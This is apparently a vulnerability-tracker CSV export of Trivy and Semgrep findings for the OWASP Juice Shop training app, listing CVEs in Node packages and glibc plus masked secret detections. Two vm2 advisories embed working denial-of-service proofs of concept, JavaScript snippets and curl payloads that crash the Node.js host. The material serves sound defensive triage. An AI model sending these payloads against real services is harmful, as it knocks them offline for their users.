17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.550822+00:00,,,,,0,[],"3.1.1, 2.1.4, 1.16.6",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2025-59343 NEWLINE https://github.com/mafintosh/tar-fs NEWLINE https://github.com/mafintosh/tar-fs/commit/0bd54cdf06da2b7b5b95cd4b062c9f4e0a8c4e09 NEWLINE https://github.com/mafintosh/tar-fs/security/advisories/GHSA-vj76-c3g6-qr5v NEWLINE https://lists.debian.org/debian-lts-announce/2025/09/msg00028.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-59343 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-59343,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-59343 Tar-Fs 2.1.3,False,False,,2026-05-12 17:37:05.550774+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-59343,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],validator,13.15.15,2026-05-12 17:37:05.554964+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P,7.7,792,2026-05-12,,,"Validator is Vulnerable to Incomplete Filtering of One or More Instances of Special Elements NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 13.15.22 NEWLINE NEWLINE Versions of the package validator before 13.15.22 are vulnerable to Incomplete Filtering of One or More Instances of Special Elements in the isLength() function that does not take into account Unicode variation selectors (\uFE0F, \uFE0E) appearing in a sequence which lead to improper string length calculation. This can lead to an application using isLength for input validation accepting strings significantly longer than intended, resulting in issues like data truncation in databases, buffer overflows in other system components, or denial-of-service. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/validator/package.json,,True,,False,False,,False,,9cf5df67a6fc9d05f1213c9df750c95c4d0d6f205e914d02f7c75001bb797b77,218,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.555022+00:00,,,,,0,[],13.15.22,,S1,False,,,,,,,,False,http://seclists.org/fulldisclosure/2026/Jan/27 NEWLINE https://gist.github.com/koral--/ad31208b25b9e3d1e2e35f1d4d72572e NEWLINE https://github.com/validatorjs/validator.js NEWLINE https://github.com/validatorjs/validator.js/commit/d457ecaf55b0f3d8bd379d82757425d0d13dd382 NEWLINE https://github.com/validatorjs/validator.js/pull/2616 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-12758 NEWLINE https://security.snyk.io/vuln/SNYK-JS-VALIDATOR-13653476,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-12758 Validator 13.15.15,False,False,,2026-05-12 17:37:05.554973+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-12758,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.617963+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H,8.6,,,0,2026-05-12,,,"vm2 has a Sandbox Escape via Promise Constructor Unhandled Rejection (Process Crash DoS) NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE ### Summary NEWLINE A sandbox escape vulnerability in vm2 v3.10.5 allows any sandboxed code to crash the host Node.js process via a single Promise constructor that triggers an unhandled rejection propagating to the host. The fix for CVE-2026-22709 (v3.10.2) only sanitized the `onRejected` callback in `.then()` and `.catch()` overrides and did not address the executor-to-unhandledRejection path. NEWLINE NEWLINE ### Details NEWLINE When sandboxed code creates a `Promise` whose executor sets `Error.name` to a `Symbol()` and then accesses `.stack`, V8's internal `FormatStackTrace` (C++) attempts `Symbol.toString()`, which throws a **host-realm TypeError**. Because this error originates inside the Promise executor and no `.catch()` handler is attached, it becomes an **unhandled rejection** that propagates to the host process. NEWLINE NEWLINE - `lib/setup-sandbox.js:38` — `localPromise` wraps the native `Promise` constructor but does not wrap the executor in try-catch. NEWLINE - `lib/setup-sandbox.js:165-230` — `resetPromiseSpecies` and the `.then()`/`.catch()` overrides sanitize the `onRejected` callback chains, but do not intercept unhandled rejections originating from the executor itself. NEWLINE NEWLINE The CVE-2026-22709 patch (v3.10.2) sanitized `.then()` and `.catch()` callback chains but left the executor-to-unhandledRejection path completely open. NEWLINE NEWLINE **Root Cause**: Promise executor errors are not caught/sanitized before they can propagate as unhandled rejections to the host process, causing an immediate process crash. NEWLINE NEWLINE **`allowAsync: false` does not help**: This setting only blocks `async`/`await` syntax and overrides `.then()`/`.catch()` to throw. The `Promise` constructor itself is still callable. Worse, because `.catch()` is blocked, any rejection from the executor is *guaranteed* to be unhandled — making `allowAsync: false` paradoxically more dangerous than `true` for this vulnerability. NEWLINE NEWLINE ### PoC NEWLINE NEWLINE **Library-level PoC (Node.js script — primary):** NEWLINE ```javascript NEWLINE const { VM } = require(""vm2""); NEWLINE NEWLINE // Works with ANY allowAsync setting — both true and false NEWLINE const vm = new VM({ timeout: 5000, allowAsync: false }); NEWLINE NEWLINE try { NEWLINE const result = vm.run(` NEWLINE new Promise(function(r, j) { NEWLINE var e = new Error(); NEWLINE e.name = Symbol(); NEWLINE e.stack; NEWLINE }); NEWLINE `); NEWLINE console.log(""Result:"", result); // Reaches here (returns Promise object) NEWLINE } catch (err) { NEWLINE console.log(""Caught:"", err); // Never executed NEWLINE } NEWLINE NEWLINE console.log(""After try-catch""); // Also prints normally NEWLINE NEWLINE // But on the next microtask tick: NEWLINE // [UnhandledPromiseRejection: TypeError: Cannot convert a Symbol value to a string] NEWLINE // Exit code: 1 NEWLINE // NEWLINE // try-catch cannot help — vm.run() returns synchronously, NEWLINE // the rejection fires asynchronously outside any catch scope. NEWLINE // NEWLINE // NOTE: allowAsync: false only blocks async/await syntax and NEWLINE // .then()/.catch() method calls. The Promise constructor itself NEWLINE // still executes, and the unhandled rejection still propagates. NEWLINE // In fact, allowAsync: false makes it WORSE — .catch() is blocked, NEWLINE // so the rejection is guaranteed to be unhandled. NEWLINE ``` NEWLINE NEWLINE **HTTP demonstration (web service impact):** NEWLINE ```bash NEWLINE # 1. Confirm server is running NEWLINE curl -s http://localhost:3000/api/execute \ NEWLINE -X POST -H ""Content-Type: application/json"" \ NEWLINE -d '{""code"":""\""alive\""""}' NEWLINE # => {""output"":[],""errors"":[],""result"":""\""alive\"""",""executionTime"":1} NEWLINE NEWLINE # 2. Send payload — server process will crash NEWLINE curl -s -X POST http://localhost:3000/api/execute \ NEWLINE -H ""Content-Type: application/json"" \ NEWLINE -d '{""code"":""new Promise(function(r,j){var e=new Error();e.name=Symbol();e.stack})""}' NEWLINE NEWLINE # 3. Server is dead (connection refused until restart) NEWLINE curl -s http://localhost:3000/ # => connection refused NEWLINE ``` NEWLINE NEWLINE ### Impact NEWLINE - **DoS**: A single request crashes the entire host Node.js process. All concurrent users lose service immediately. In Node.js 15+, unhandled rejections terminate the process by default — no special configuration is required for the crash to occur. NEWLINE - **Persistent DoS despite restart policies**: Even when container orchestration (Docker restart policy, Kubernetes liveness probes, PM2, etc.) automatically restarts the crashed process, an attacker can send repeated requests to crash the process again before it fully recovers. In our testing, a single `curl` request caused the Docker container to restart (confirmed via `StartedAt` timestamp change), and sending the next request immediately after restart triggered another crash. This creates a **continuous denial-of-service loop** where the service never becomes available to legitimate users — each restart is met with another crash before any real request can be served. NEWLINE - **Amplification**: A single HTTP request (~150 bytes) terminates the entire host process serving all users. The cost to the attacker is negligible compared to the impact. NEWLINE - **Scope**: **All applications using vm2, regardless of `allowAsync` setting.** `allowAsync: false` only blocks `async`/`await` syntax and `.then()`/`.catch()` method calls — the `Promise` constructor itself still executes, and the unhandled rejection still propagates. In fact, `allowAsync: false` makes the vulnerability *worse* because `.catch()` is blocked, guaranteeing the rejection is always unhandled. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,76ac1f1334c97b4c868baabd46d5ede3fe6647461e966320b7c2b52cbf98b8e0,234,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.618016+00:00,,,,,0,[],3.11.0,,S1,False,,,,,,,,False,https://github.com/advisories/GHSA-99p7-6v5w-7xg8 NEWLINE https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-hw58-p9xv-2mjh,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-44001 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.617970+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-44001,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.622223+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,0,2026-05-12,,,"vm2 Sandbox Access to Host Buffer.alloc Allows timeout Bypass Resulting in Memory Exhaustion NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE ### Summary NEWLINE Sandboxed code can call `Buffer.alloc()` with an arbitrary size to allocate memory directly on the host heap. Because `Buffer.alloc` is a synchronous C++ native call, vm2's `timeout` option cannot interrupt it. A single request can exhaust host memory and crash the process with a `FATAL ERROR: Reached heap limit`. NEWLINE NEWLINE ### Details NEWLINE In `lib/vm.js:58`, `Buffer` is exposed to the sandbox through the `HOST` object. The bridge proxy (`lib/bridge.js`) passes `Buffer.alloc()` calls to the host without any size validation. NEWLINE NEWLINE Key technical distinction from regular JavaScript memory exhaustion (e.g., `while(true) a.push(...)`): NEWLINE - **JavaScript loops**: V8 can interrupt via timeout — vm2's `timeout` option works NEWLINE - **`Buffer.alloc(N)`**: Executes as a single synchronous C++ call — V8 timeout has no opportunity to interrupt NEWLINE NEWLINE This means: NEWLINE 1. `timeout: 5000` does NOT protect against this attack NEWLINE 2. A single call allocates the entire requested size at once NEWLINE 3. In memory-constrained environments (Docker, Lambda, Kubernetes pods), this causes immediate OOM crash NEWLINE NEWLINE Tested amplification factor: ~100 bytes HTTP request — 1,000,000:1 or greater (100 bytes request to 100MB+ host heap allocation). NEWLINE NEWLINE ### PoC NEWLINE NEWLINE **Library-level PoC (Node.js script — primary):** NEWLINE ```javascript NEWLINE const { VM } = require(""vm2""); NEWLINE const vm = new VM({ timeout: 5000 }); NEWLINE NEWLINE // Buffer.alloc bypasses timeout — allocates 100MB on host heap NEWLINE const result = vm.run(`Buffer.alloc(1024*1024*100).length`); NEWLINE console.log(result); // 104857600 — timeout had no effect NEWLINE NEWLINE // Control test — JavaScript loop IS caught by timeout NEWLINE try { NEWLINE vm.run(`var a=[]; while(true) a.push(1)`); NEWLINE } catch(e) { NEWLINE console.log(e.message); // ""Script execution timed out after 5000ms"" NEWLINE } NEWLINE ``` NEWLINE NEWLINE **HTTP demonstration (OOM crash):** NEWLINE ```bash NEWLINE # 1. Confirm server is running NEWLINE curl -s http://localhost:3000/api/execute \ NEWLINE -X POST -H ""Content-Type: application/json"" \ NEWLINE -d '{""code"":""\""alive\""""}' NEWLINE # => {""result"":""\""alive\""""} NEWLINE NEWLINE # 2. Send Buffer.alloc payload — process crashes with OOM NEWLINE curl -s -X POST http://localhost:3000/api/execute \ NEWLINE -H ""Content-Type: application/json"" \ NEWLINE -d '{""code"":""Buffer.alloc(1024*1024*100).length""}' NEWLINE # => empty response (process died) NEWLINE NEWLINE # 3. Check server logs: NEWLINE # FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory NEWLINE NEWLINE # Control test — JavaScript loop IS caught by timeout: NEWLINE curl -s -X POST http://localhost:3000/api/execute \ NEWLINE -H ""Content-Type: application/json"" \ NEWLINE -d '{""code"":""var a=[]; while(true) a.push(1)""}' NEWLINE # => {""errors"":[""Script execution timed out after 5000ms""]} NEWLINE # Server stays alive — timeout works for JS, but NOT for Buffer.alloc NEWLINE ``` NEWLINE NEWLINE ### Impact NEWLINE - **DoS**: A single HTTP request crashes the host Node.js process via OOM. The `timeout` option provides no protection. NEWLINE - **Environment-dependent severity**: NEWLINE - **Memory-constrained environments** (Docker with memory limits, Kubernetes pods, Lambda): The allocation exceeds the memory limit, causing immediate process termination via OOM. This is the primary threat scenario — `FATAL ERROR: Reached heap limit` was confirmed in testing. NEWLINE - **Unconstrained environments**: The allocation succeeds and memory is reclaimed by GC after the request completes, resulting in temporary performance degradation rather than a crash. NEWLINE - **Scope**: All applications using vm2. Default configuration is vulnerable. Memory-constrained environments (Docker, Kubernetes, Lambda) are most severely impacted. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,c7324afbcc4f243499b8d6ead879f41542c6be7e1c25561edf75ff6a631ab4af,235,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.622283+00:00,,,,,0,[],3.11.0,,S1,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-6785-pvv7-mvg7,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-44004 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.622233+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-44004,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],ws,7.4.6,2026-05-12 17:37:05.646012+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,476,2026-05-12,,,"nodejs-ws: denial of service when handling a request with many HTTP headers NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 5.2.4, 6.2.3, 7.5.10, 8.17.1 NEWLINE NEWLINE ws is an open source WebSocket client and server for Node.js. A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server. The vulnerability was fixed in ws@8.17.1 (e55e510) and backported to ws@7.5.10 (22c2876), ws@6.2.3 (eeb76d3), and ws@5.2.4 (4abd8f6). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent. 2. Set server.maxHeadersCount to 0 so that no limit is applied. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/engine.io/node_modules/ws/package.json,,True,,False,False,,False,,7ba8c33b64da51d8c714ca44cc31ddf1f4ded1cbe10d6221172a0c8eccafdcc4,241,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.646068+00:00,,,,,0,[],"5.2.4, 6.2.3, 7.5.10, 8.17.1",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2024-37890 NEWLINE https://github.com/websockets/ws NEWLINE https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f NEWLINE https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e NEWLINE https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c NEWLINE https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63 NEWLINE https://github.com/websockets/ws/issues/2230 NEWLINE https://github.com/websockets/ws/pull/2231 NEWLINE https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q NEWLINE https://nodejs.org/api/http.html#servermaxheaderscount NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2024-37890 NEWLINE https://www.cve.org/CVERecord?id=CVE-2024-37890,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2024-37890 Ws 7.4.6,False,False,,2026-05-12 17:37:05.646020+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2024-37890,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],,,2026-05-12 17:37:05.649832+00:00,,,,,0,2026-05-12,,,Asymmetric Private Key NEWLINE **Category:** AsymmetricPrivateKey NEWLINE **Match:** ----BEGIN RSA PRIVATE KEY-----****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************-----END RSA PRIVATE NEWLINE ,False,,,False,,,,False,/juice-shop/build/lib/insecurity.js,,True,,False,False,,False,,5ad948478ac7188141e618ebe6b972ef0264605097a5df62b237c8cfba18dc45,242,,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.649887+00:00,47,,,,0,[],,,S1,False,,,,,,,,False,,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,Secret Detected in /juice-shop/build/lib/insecurity.js - Asymmetric Private Key,False,False,,2026-05-12 17:37:05.649841+00:00,,False,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,,secret,Active, +,,True,0,[],,,2026-05-12 17:37:04.510304+00:00,,,,,78,2026-05-12,,,"**Result message:** Using variable interpolation `${{...}}` with `github` context data in a `run:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: ""$ENVVAR"". NEWLINE ",False,,,False,,,,False,/src/.github/workflows/update-challenges-ebook.yml,,,,False,False,,False,,3054b8f839b1b9d3e981f8b4e46a8f032ad1015eb9b56f72610783dd64fd01a2,1,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.510374+00:00,21,,,,0,[],,1,S1,False,,,,,,,,False,https://docs.github.com/en/actions/learn-github-actions/security-hardening-for-github-actions#understanding-the-risk-of-script-injections NEWLINE https://securitylab.github.com/research/github-actions-untrusted-input/,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,yaml.github-actions.security.run-shell-injection.run-shell-injection,False,False,,2026-05-12 17:37:04.510314+00:00,,False,,yaml.github-actions.security.run-shell-injection.run-shell-injection,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],,,2026-05-12 17:37:05.652908+00:00,,,,,0,2026-05-12,,,"JWT token NEWLINE **Category:** JWT NEWLINE **Match:** ocalStorage.setItem('token', '***********************************************************************************************************************************************************') NEWLINE ",False,,,False,,,,False,/juice-shop/frontend/src/app/app.guard.spec.ts,,True,,False,False,,False,,cc6334f2f6869e79290dd6ba150a78373e43daaf027248c6b5cef20fb87c702d,243,,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.652964+00:00,38,,,,0,[],,,S2,False,,,,,,,,False,,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,Secret Detected in /juice-shop/frontend/src/app/app.guard.spec.ts - JWT Token,False,False,,2026-05-12 17:37:05.652917+00:00,,False,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,,secret,Active, +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.626629+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N,5.3,,,74,2026-05-12,,,vm2: Inspect Manipulation NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.9.18 NEWLINE NEWLINE vm2 is a sandbox that can run untrusted code with Node's built-in modules. In versions 3.9.17 and lower of vm2 it was possible to get a read-write reference to the node `inspect` method and edit options for `console.log`. As a result a threat actor can edit options for the `console.log` command. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. Users unable to upgrade may make the `inspect` method readonly with `vm.readonly(inspect)` after creating a vm. NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,5fb6af946fd3dca184989d4aa3c55572e1db77bdbe8263c1baf049274761808f,236,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.626685+00:00,,,,,0,[],3.9.18,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2023-32313 NEWLINE https://gist.github.com/arkark/c1c57eaf3e0a649af1a70c2b93b17550 NEWLINE https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/commit/5206ba25afd86ef547a2c9d48d46ca7a9e6ec238 NEWLINE https://github.com/patriksimek/vm2/releases/tag/3.9.18 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-p5gc-c584-jj6v NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2023-32313 NEWLINE https://www.cve.org/CVERecord?id=CVE-2023-32313,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2023-32313 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.626638+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2023-32313,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],notevil,1.3.3,2026-05-12 17:37:05.395861+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N,6.5,,,1321,2026-05-12,,,"Sandbox escape in notevil and argencoders-notevil NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** NEWLINE NEWLINE This affects all versions of package notevil; all versions of package argencoders-notevil. It is vulnerable to Sandbox Escape leading to Prototype pollution. The package fails to restrict access to the main context, allowing an attacker to add or modify an object's prototype. **Note:** This vulnerability derives from an incomplete fix in [SNYK-JS-NOTEVIL-608878](https://security.snyk.io/vuln/SNYK-JS-NOTEVIL-608878). NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/notevil/package.json,,False,,False,False,,False,,3a6874fa5fa6840d961fde6018b4c34d819ae477a711f7ed9ce20ba68b9a692b,178,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.395914+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://github.com/mmckegg/notevil NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2021-23771 NEWLINE https://snyk.io/vuln/SNYK-JS-ARGENCODERSNOTEVIL-2388587 NEWLINE https://snyk.io/vuln/SNYK-JS-NOTEVIL-2385946,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2021-23771 Notevil 1.3.3,False,False,,2026-05-12 17:37:05.395868+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2021-23771,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.814037+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L,5.3,,,617,2026-05-12,,,"glibc: glibc: Denial of Service via iconv() function with specific character sets NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE The iconv() function in the GNU C Library versions 2.43 and earlier may crash due to an assertion failure when converting inputs from the IBM1390 or IBM1399 character sets, which may be used to remotely crash an application. NEWLINE NEWLINE NEWLINE NEWLINE This vulnerability can be trivially mitigated by removing the IBM1390 and IBM1399 character sets from systems that do not need them. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,96ef8ea31a4000ef8b660117d1471f0080f79438338afded4dd68f53d5735bb1,33,fix_deferred,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.814133+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-4046 NEWLINE https://inbox.sourceware.org/libc-announce/76814edf-cf7f-47ec-979d-2dce0a2c76bf@gotplt.org/T/#u NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-4046 NEWLINE https://packages.fedoraproject.org/pkgs/glibc/glibc-gconv-extra/ NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=33980 NEWLINE https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007 NEWLINE https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007;hb=HEAD NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-4046,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2026-4046 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.814050+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-4046,debian; os-pkgs,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.818136+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L,6.5,,,125,2026-05-12,,,"glibc: glibc: Incorrect DNS response parsing via crafted DNS server response NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C Library version 2.34 to version 2.43 could, with a crafted response from the configured DNS server, result in a violation of the DNS specification that causes the application to treat a non-answer section of the DNS response as a valid answer. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,6a8c886f848e8f812bfdf251c83781d3964e6ee043dce4a87f57c56073fc3e82,34,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.818193+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-4437 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-4437 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=34014 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-4437 NEWLINE https://www.openwall.com/lists/oss-security/2026/03/23/2,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2026-4437 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.818145+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-4437,debian; os-pkgs,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.822846+00:00,CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N,4.0,,,20,2026-05-12,,,glibc: glibc: Invalid DNS hostname returned via gethostbyaddr functions NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C library version 2.34 to version 2.43 could result in an invalid DNS hostname being returned to the caller in violation of the DNS specification. NEWLINE ,False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,6bb30d870cf3a5e63eeb52b76f48b159aaa0bf3168a174d0c1d88dd6634db80f,35,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.822906+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-4438 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-4438 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=34015 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-4438 NEWLINE https://www.openwall.com/lists/oss-security/2026/03/23/2,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2026-4438 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.822856+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-4438,debian; os-pkgs,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.826751+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:H,5.9,,,787,2026-05-12,,,"glibc: glibc: Out-of-bounds write via TSIG record processing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the GNU C Library version 2.2 and newer fail to enforce the caller-supplied buffer length, and can result in an out-of-bounds write when printing TSIG records. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,720852fe6850e835d1fe0c4becc6119bfbc1279972dda972facde9b87a0c6d3c,36,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 